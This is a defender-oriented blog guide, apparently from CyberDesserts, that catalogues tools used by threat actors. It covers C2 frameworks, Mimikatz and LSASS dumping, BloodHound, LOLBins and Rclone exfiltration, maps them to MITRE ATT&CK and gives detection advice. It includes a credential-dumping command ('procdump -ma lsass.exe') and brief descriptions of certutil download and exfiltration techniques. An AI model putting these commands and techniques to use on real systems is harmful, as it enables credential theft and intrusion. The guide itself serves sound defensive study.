Sign in Subscribe
12 min read

Threat Actor Tools: The Complete Guide for Defenders

Threat Actor Tools
Threat Actor Tools - Photo by Drew Harbour / Unsplash

Eighty-four percent of high-severity cyberattacks in 2024 leveraged legitimate system tools rather than custom malware (Vectra AI). Cobalt Strike appeared in the majority of ransomware intrusions, while credential-dumping tools like Mimikatz remain ubiquitous across both nation-state and criminal operations.

Understanding these tools should be an important part of your defensive strategy and knowledge base.

This guide maps the threat actor toolkit to real-world tradecraft. Each tool category is tied to MITRE ATT&CK techniques and the threat groups known to deploy them. The goal is practical: help defenders recognise these tools in their environments and understand what each capability signals about attacker intent.

Get articles like this delivered to your inbox. Subscribe to CyberDesserts for practical security insights, no fluff.

Why Threat Actors Use Legitimate Tools

The shift toward dual-use tools is deliberate. When attackers deploy Cobalt Strike, Mimikatz, or Rclone, they're exploiting a fundamental defender problem: these tools serve legitimate purposes.

PowerShell appears in 71% of living-off-the-land (LOTL) attacks (Vectra AI). System administrators use it daily. Security tools trust it implicitly. This creates the detection gap attackers love to exploit.

CrowdStrike's 2025 Global Threat Report found 62% of detections were malware-free attacks using LOTL methods. Fortra's crackdown on pirated Cobalt Strike reduced unauthorised copies in the wild by 80%, but attackers simply pivoted to alternatives like Sliver, Brute Ratel, and Havoc.

Tools are evolving all the time but the goal is the same to evade detection.

Command and Control Frameworks

C2 frameworks give attackers persistent, stealthy access to compromised networks. They're the backbone of virtually every modern intrusion.

Cobalt Strike

Cobalt Strike remains the dominant post-exploitation framework despite years of defender focus. Its Beacon implant provides command execution, credential harvesting, lateral movement, and payload delivery through encrypted channels.

ATT&CK Techniques: T1071 (Application Layer Protocol), T1055 (Process Injection), T1059 (Command and Scripting Interpreter)

Known Users: APT29 (Cozy Bear), APT41, FIN6, FIN7, Black Basta, LockBit affiliates, Conti, Ryuk operators

Beacon operates in-memory without touching disk, supports HTTP, HTTPS, DNS, and SMB channels, and can be extensively customised through Malleable C2 profiles. The tool integrates Mimikatz for credential theft and provides DCSync functionality for domain hash extraction.

Recent developments include takedown efforts that reduced pirated copies significantly, driving some actors toward alternatives.

Sliver

Sliver emerged as the primary open-source alternative to Cobalt Strike. Written in Go, it supports HTTP, WireGuard, DNS, and Mutual TLS for C2 communications.

ATT&CK Techniques: T1071 (Application Layer Protocol), T1572 (Protocol Tunneling)

Known Users: DEV-0237 (FIN12), Ryuk affiliates, Hive operators, various APT groups

Microsoft observed nation-state actors, ransomware groups, and cybercriminals integrating Sliver into attack chains. Team Cymru linked campaigns targeting government, telecom, and higher education sectors to Sliver-based infrastructure.

Brute Ratel

Brute Ratel markets itself as a red team tool but is actively abused by threat actors. Its implants evade many EDR solutions through novel techniques.

ATT&CK Techniques: T1055 (Process Injection), T1134 (Access Token Manipulation)

Known Users: Qbot operators, Black Basta affiliates

The tool supports DLL, executable, PowerShell, and service binary payloads. It provides SMB lateral movement, privilege escalation, and process injection capabilities. Security vendors increasingly flag Brute Ratel, but detection remains challenging.

Other C2 Frameworks

Several frameworks round out the threat actor toolkit:

Metasploit - The original open-source exploitation framework. Still widely used for initial access and as a payload delivery mechanism. Meterpreter payloads provide extensive post-exploitation capabilities.

Empire - PowerShell-based post-exploitation framework favoured for credential theft and lateral movement. Frequently observed in espionage campaigns.

Mythic - Modular C2 with agents for Windows, macOS, and Linux. Supports TCP, HTTP, DNS, and SMB protocols. Growing adoption among sophisticated actors.

PoshC2 - PowerShell-based C2 used in APT campaigns. Lightweight and highly customisable.

Havoc - Modern C2 framework gaining traction as Cobalt Strike alternatives become necessary.

Credential Theft and Dumping Tools

Credential access represents the pivot point in most intrusions. With valid credentials, attackers move laterally without triggering malware-based detections.

Mimikatz

Mimikatz remains the gold standard for credential extraction. Created by Benjamin Delpy as a proof of concept, it's now one of the most widely deployed threat actor tools globally.

ATT&CK Techniques: T1003 (OS Credential Dumping), T1550 (Use Alternate Authentication Material)

Known Users: APT28, APT29, Lazarus Group, OilRig, Turla, Carbanak, FIN6, virtually all ransomware operators

Mimikatz extracts plaintext passwords, NTLM hashes, Kerberos tickets, and PIN codes from Windows memory. Its modules include:

  • sekurlsa - Dumps credentials from LSASS process memory
  • kerberos - Manipulates Kerberos tickets for pass-the-ticket attacks
  • crypto - Accesses CryptoAPI for certificate extraction

Cobalt Strike integrates Mimikatz directly, allowing in-memory execution without disk artifacts. This combination appears in the majority of ransomware intrusions.

LSASS Dumping Tools

When direct Mimikatz execution fails, attackers dump LSASS memory for offline credential extraction:

ProcDump - Microsoft Sysinternals tool legitimately used for debugging. Attackers use procdump -ma lsass.exe to capture memory for offline analysis.

NanoDump - Purpose-built for stealth LSASS dumping. Evades many EDR solutions through syscall techniques.

SharpDump - .NET implementation for LSASS dumping. Often deployed through Cobalt Strike.

Impacket secretsdump - Python tool for extracting domain hashes remotely. Requires privileged access but operates without touching target disk.

Kerberos Attack Tools

Active Directory's Kerberos implementation creates attack surface that threat actors routinely exploit:

Rubeus - C# toolset for Kerberos attacks including Kerberoasting, AS-REP roasting, ticket manipulation, and delegation abuse.

ATT&CK Techniques: T1558 (Steal or Forge Kerberos Tickets)

Password Recovery Tools

LaZagne - Extracts saved passwords from browsers, email clients, databases, and sysadmin tools. Supports Windows, Linux, and macOS.

Active Directory Reconnaissance

Understanding Active Directory relationships is essential for attackers planning lateral movement. These tools map attack paths through complex environments.

BloodHound

BloodHound uses graph theory to visualise Active Directory relationships and identify attack paths. It reveals hidden connections between users, groups, computers, and domain controllers that would otherwise require extensive manual analysis.

ATT&CK Techniques: T1087 (Account Discovery), T1069 (Permission Groups Discovery)

Known Users: Black Basta, APT groups, nearly all sophisticated ransomware operators

Data collection occurs through SharpHound (C#), SoapHound (SOAP-based), or ShadowHound variants. The tool queries LDAP, SMB, and Active Directory Web Services to map:

  • User-group memberships and permissions
  • Logon sessions revealing which users access which computers
  • Trust relationships between domains
  • Attack paths to domain admin privileges

BloodHound is frequently deployed early in intrusions. Detecting SharpHound activity often indicates reconnaissance preceding lateral movement.

CrackMapExec

CrackMapExec (CME) automates Active Directory exploitation. It performs credential testing, shares enumeration, command execution, and post-exploitation across large environments.

ATT&CK Techniques: T1021 (Remote Services), T1135 (Network Share Discovery)

The tool supports SMB, WinRM, SSH, LDAP, and MSSQL protocols. Attackers use it to spray credentials, enumerate shares, and execute commands across many hosts simultaneously.

Additional AD Tools

Impacket Suite - Python collection for SMB, Kerberos, and NTLM attacks. Includes secretsdump, psexec, wmiexec, and numerous protocol-specific tools.

Responder - Captures credentials through LLMNR, NBT-NS, and MDNS poisoning. Effective on networks without proper DNS configuration.

PowerView/SharpView - AD enumeration tools often used alongside BloodHound for detailed reconnaissance.

Lateral Movement Tools

Once attackers establish a foothold and obtain credentials, lateral movement spreads access across the network.

PsExec and Variants

PsExec enables remote command execution through SMB. Legitimate administrators use it daily, which makes malicious usage difficult to distinguish.

ATT&CK Techniques: T1021.002 (SMB/Windows Admin Shares), T1569 (System Services)

Known Users: Virtually all ransomware operators, APT groups, crimeware actors

Impacket's psexec.py provides similar functionality through Python. Attackers frequently rename these tools or use custom implementations to evade signature-based detection.

WMI and WinRM

Windows Management Instrumentation (WMI) and Windows Remote Management (WinRM) provide native remote execution capabilities:

wmic - Command-line WMI access for queries and remote execution Evil-WinRM - Ruby tool for WinRM-based lateral movement, commonly used after obtaining credentials

ATT&CK Techniques: T1047 (Windows Management Instrumentation), T1021.006 (Windows Remote Management)

Remote Desktop Protocol

RDP provides interactive access once credentials are obtained. Attackers increasingly enable Restricted Admin Mode to allow pass-the-hash attacks over RDP.

ATT&CK Techniques: T1021.001 (Remote Desktop Protocol)

Privilege Escalation and Evasion

After initial access, attackers need elevated privileges and must evade defensive tools.

Privilege Escalation Discovery

WinPEAS/LinPEAS - Automated scripts that enumerate misconfigurations exploitable for privilege escalation. Check for unquoted service paths, weak permissions, credential exposure, and dozens of other issues.

Seatbelt - C# tool for Windows security posture enumeration. Identifies defensive tools, credentials, and potential escalation paths.

SharpUp - Checks for common Windows privilege escalation vectors including service misconfigurations, scheduled task vulnerabilities, and DLL hijacking opportunities.

UAC Bypass and Evasion

UACME - Collection of User Account Control bypass methods. Regularly updated with new techniques as Microsoft patches existing ones.

ATT&CK Techniques: T1548 (Abuse Elevation Control Mechanism)

EDR Evasion

Modern attacks routinely include EDR evasion components:

SysWhispers - Generates direct syscall implementations to bypass EDR hooks on Windows API functions.

Process Hollowing/Injection - Techniques for hiding malicious code within legitimate processes. Cobalt Strike's process injection is heavily used.

Attackers increasingly use Bring Your Own Vulnerable Driver (BYOVD) techniques to disable security products entirely. Warp AVKiller and similar tools exploit vulnerable signed drivers to terminate EDR processes.

Living Off the Land Binaries (LOLBins)

LOLBins are legitimate Windows binaries abused for malicious purposes. The LOLBAS project documents over 200 such binaries.

Most Commonly Abused

powershell.exe - Present in 71% of LOTL attacks. Downloads payloads, executes scripts, performs reconnaissance, and communicates with C2 infrastructure.

certutil.exe - Legitimate certificate utility. Attackers use -urlcache flag to download files and -encode/-decode for Base64 operations.

bitsadmin.exe - Background Intelligent Transfer Service tool. Creates persistent download jobs that survive reboots.

mshta.exe - Executes HTML Application files. Frequently used to run malicious scripts without triggering PowerShell logging.

rundll32.exe - Executes DLL files. Abused to run malicious code and proxy execution through legitimate processes.

regsvr32.exe - Registers COM servers. Abused to execute remote scripts through "squiblydoo" and similar techniques.

ATT&CK Techniques: T1218 (System Binary Proxy Execution)

Detection Approach

Monitoring LOLBin usage requires context-aware detection. Baseline normal usage patterns, then alert on anomalies:

  • PowerShell with encoded commands or suspicious parent processes
  • certutil connecting to external URLs
  • bitsadmin creating download jobs outside IT operations
  • mshta executing content from temp directories or network locations

Want to go deeper on detection? See our guide to ELK Stack Security Monitoring for hands-on SIEM implementation.

Data Exfiltration Tools

Double extortion now dominates ransomware tactics. Data theft occurs before encryption, creating leverage even if victims restore from backups.

Rclone

Rclone appeared in 57% of ransomware incidents investigated by ReliaQuest between September 2023 and July 2024. This open-source file synchronisation tool integrates with Google Drive, Amazon S3, Mega, Dropbox, and dozens of other cloud services.

ATT&CK Techniques: T1567 (Exfiltration Over Web Service)

Known Users: LockBit, Black Basta, BlackSuit, Conti, Akira

Attackers value Rclone for its speed, automation capabilities, and ability to blend with legitimate backup operations. They often rename the executable to evade static detection.

Detection strategies include monitoring for:

  • Rclone processes spawned by SYSTEM
  • Suspicious command-line arguments
  • Large outbound transfers to cloud storage services

Other Exfiltration Tools

WinSCP - Open-source SFTP/FTP client. Scripting capabilities enable automated data transfers.

cURL - Command-line transfer tool native to Windows 10+. Black Basta used cURL with temp.sh for exfiltration.

FileZilla - FTP client found in ransomware toolkits alongside Rclone.

Restic - Backup utility abused to push data to attacker-controlled cloud storage.

MegaSync/MEGA CMD - Cloud storage client frequently used for staging exfiltrated data.

Tunnelling Tools

Chisel - Creates encrypted tunnels through HTTP. Used to establish covert channels for data transfer.

Socat - Multipurpose relay tool. Creates port forwards and encrypted tunnels.

Proxifier/SystemBC - SOCKS proxy tools that route traffic through compromised hosts.

Ransomware Operator Toolchains

Modern ransomware operations follow predictable patterns. Understanding typical toolchains helps defenders anticipate attacker behaviour.

Common Progression

A typical ransomware intrusion from initial access to encryption:

  1. Initial Access - Phishing, exploited vulnerability, or purchased access (IcedID, Qakbot, BumbleBee loaders)
  2. C2 Establishment - Cobalt Strike, Sliver, or Brute Ratel beacon deployed
  3. Credential Theft - Mimikatz, LSASS dumping, LaZagne
  4. Reconnaissance - BloodHound/SharpHound, network scanning
  5. Lateral Movement - PsExec, WMI, RDP with stolen credentials
  6. Exfiltration - Rclone, WinSCP to cloud storage
  7. Defence Evasion - Security tool disabling via BYOVD or GPO
  8. Encryption - Ransomware payload deployed via PsExec, WMI, or GPO

The median dwell time before ransomware deployment is approximately five days (Gridinsoft). Time to Ransomware (TTR) averaged 156 hours in recent incidents.

Group-Specific Preferences

LockBit - Cobalt Strike, PsExec, Rclone, custom encryptor. Used Warp AVKiller for EDR bypass.

Black Basta - Cobalt Strike or Brute Ratel, BloodHound, Rclone to temp.sh, batch scripts for security disabling.

Akira - Shares code lineage with Conti. Uses Rclone, WinSCP, custom tools.

Qilin - Remote access exploits for entry, NetSupport Manager, Rclone for exfiltration.

MITRE ATT&CK Mapping Summary

The tools covered in this guide map to specific ATT&CK techniques:

Tool Category Primary Techniques
C2 Frameworks T1071, T1572, T1055, T1059
Credential Theft T1003, T1550, T1558
AD Reconnaissance T1087, T1069, T1135
Lateral Movement T1021, T1047, T1569
Privilege Escalation T1548, T1134
LOLBins T1218, T1059
Exfiltration T1567, T1048

Using ATT&CK mapping helps defenders prioritise detection engineering. Focus on the techniques appearing most frequently in threat intelligence for your industry sector.

Building Detection Coverage

Effective detection requires layered approaches:

Endpoint Telemetry - EDR solutions should capture process creation, network connections, and credential access events. Ensure coverage for in-memory attacks and LOLBin abuse.

Network Monitoring - Baseline normal traffic patterns. Alert on unusual DNS queries, unexpected cloud service connections, and lateral movement protocols (SMB, WMI, WinRM) between endpoints.

Identity Monitoring - Track authentication patterns, privilege changes, and Kerberos ticket activity. BloodHound and Mimikatz usage often manifests through unusual LDAP queries and authentication events.

Log Aggregation - Centralise Windows Event Logs, PowerShell Script Block Logging, and Sysmon data. Correlate across sources to identify attack chains.

Summary

Threat actors operate with a remarkably consistent toolkit. Cobalt Strike, Mimikatz, BloodHound, and Rclone appear across nation-state, crimeware, and ransomware operations. Living-off-the-land techniques using PowerShell and other LOLBins dominate modern attack chains.

Understanding these tools provides defenders with concrete detection targets. Rather than chasing indicators of compromise that change daily, focus on the techniques and tradecraft that persist across campaigns.

Key principles for defenders:

  • Assume breach - Modern attacks leverage legitimate tools that bypass perimeter defences
  • Focus on behaviour - Signature-based detection fails against dual-use tools
  • Layer detection - Combine endpoint, network, and identity monitoring
  • Map to ATT&CK - Prioritise detection engineering based on threat intelligence
  • Practice response - When you detect Cobalt Strike, BloodHound, or Rclone, you need fast containment

The tools will evolve. Sliver replaces Cobalt Strike. New C2 frameworks emerge. But the fundamental tradecraft patterns remain stable. Build detection capability around those patterns.

Subscribe for Updates

This guide will be updated as the threat landscape shifts. Subscribers receive notifications when major changes happen, plus weekly practical security content. No sales pitches, no fluff.

Last updated: January 2026

References and Sources

  1. Vectra AI. (2025). Living off the Land Attacks. Key finding: 84% of high-severity attacks in 2024 leveraged legitimate tools; PowerShell appeared in 71% of LOTL attacks.
  2. CrowdStrike. (2025). Global Threat Report 2025. Key finding: 62% of threat detections were malware-free attacks using LOTL methods.
  3. Fortra. (2025). Update: Stopping Cybercriminals from Abusing Cobalt Strike. Key finding: 80% reduction in unauthorised Cobalt Strike copies over two years.
  4. ReliaQuest. (2024). Exfiltration Tools Report. Key finding: Rclone appeared in 57% of ransomware incidents (September 2023 - July 2024).
  5. The DFIR Report. (2024-2025). Case Studies. Multiple ransomware intrusion analyses documenting Cobalt Strike, Sliver, and common toolchain patterns.
  6. MITRE ATT&CK. (2025). Groups, Software, and Techniques. Framework for threat actor tool mapping.
  7. Red Canary. (2025). Threat Detection Report: C2 Frameworks. Key finding: Cobalt Strike ranked #8 overall threat; Sliver, Brute Ratel, Mythic gaining adoption.
  8. Mandiant/Google Cloud. (2024). Defining Cobalt Strike Components. Technical deep-dive on Beacon implant and Cobalt Strike capabilities.
  9. SpecterOps. (2025). BloodHound Documentation. Attack path management and Active Directory reconnaissance tool documentation.

Frequently Asked Questions

What is Cobalt Strike and why do attackers use it?

Cobalt Strike is a commercial penetration testing tool whose Beacon implant provides command execution, credential theft, lateral movement, and encrypted C2 communications. Attackers favour it for its stability, flexibility, and extensive capabilities. Pirated versions have been widely available, though recent enforcement reduced their prevalence by 80%.

How do I detect Mimikatz in my environment?

Focus on LSASS access patterns, unusual authentication events, and process behaviour rather than file signatures. Monitor for processes accessing LSASS memory, unusual Kerberos ticket activity, and credential dumping indicators in Windows Security Events (4624, 4672, 4768). Cobalt Strike can run Mimikatz in-memory without disk artifacts.

What is the difference between Cobalt Strike and Sliver?

Cobalt Strike is commercial ($5,900/user) with extensive customisation options. Sliver is open-source, written in Go, and supports similar C2 capabilities. Both provide post-exploitation functionality. Sliver adoption increased as defenders improved Cobalt Strike detection and enforcement actions reduced pirated copies.

Why do ransomware groups use Rclone?

Rclone transfers data quickly to multiple cloud services, blends with legitimate backup traffic, operates cross-platform, and automates large transfers. Its versatility and speed make it ideal for exfiltrating data before encryption in double extortion attacks.

What are LOLBins and why are they dangerous?

Living-off-the-Land Binaries (LOLBins) are legitimate Windows tools like PowerShell, certutil, and mshta that attackers abuse for malicious purposes. They're dangerous because security tools trust them, they leave minimal forensic artifacts, and their legitimate use makes malicious activity difficult to distinguish.

How do I map these tools to my detection capabilities?

Use MITRE ATT&CK to identify which techniques each tool enables, then assess whether your current telemetry and detection rules cover those techniques. Prioritise based on threat intelligence relevant to your industry sector.

Member discussion